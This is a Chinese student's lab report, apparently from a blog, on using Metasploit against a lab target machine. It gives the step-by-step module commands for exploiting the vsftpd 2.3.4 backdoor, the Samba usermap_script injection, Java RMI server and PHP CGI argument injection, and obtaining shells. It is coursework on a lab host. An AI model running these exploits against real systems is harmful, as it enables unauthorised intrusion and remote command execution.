1.实验内容
本周学习了metasploit的用法并趁热打铁做了一场痛彻心扉实践课。很好的实践题让我下六个虚拟机:)
2.实验过程
靶机 IP 172.16.230.80
主机 IP 172.16.227.205
(1)前期渗透
Search一下,标白的地方就是等下要use的
use auxiliary/scanner/discovery/arp_sweep
然后输入show options看一下要指定哪些内容,可以看到还需要指定RHOSTS,就是要扫描的地址
接下来进行端口扫描,输入
nmap 172.16.230.80
哇,都open了,要是上回实践用的是这个靶机该多好:)
(2)Vsftpd源码包后门漏洞(21端口)
输入use exploit/unix/ftp/vsftpd_234_backdoor进行攻击,payload需要指定RHOSTS和SPORT,端口已经是21了,只需要再指定下目标地址了
set RHOSTS 172.16.230.80
run
接下来可以看到有会话建立了,攻击成功:)
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
use exploit/multi/samba/usermap_script
set RHOST 172.16.230.80
exploit
利用成功 执行uname–a验证
(4)Java RMI SERVER命令执行漏洞(1099端口)
之前已经使用nmap命令扫到1099端口是开着的了,直接攻击
use exploit/multi/misc/java_rmi_server,再使用show options看一下需要指定什么参数
set RHOST 172.16.230.80
exploit
sessions -i 1
shell
(5)PHP CGI参数执行注入漏洞(80端口)
use exploit/multi/http/php_cgi_arg_injection
set RHOST 172.16.230.80
exploit/run 开始攻击
3.问题及解决方案
由于上次实践把苦都吃完了,这次实验给的靶机也好用,指导书也把指明都给了,因此没碰见啥问题。
4.学习感悟、思考等
我和同学们做实验的时候都感觉这次实验六和上回实践应该反过来,因为这次实验实在是做得很轻松,二十分来分钟就实验连报告给搞定了,不像上回实践作业我连第二个靶机都还没下完。这次实验做起来还特别顺手,因为对metasploit的攻击流程还是比较熟悉了,search-use-show-set-run这一套流程像开自己家门一样熟悉,越做越熟练也是我们实践课的意义吧。
标签:use,端口,2024,2025,exploit,实验,230.80,20222415,172.16 From: https://www.cnblogs.com/2415trq/p/18558483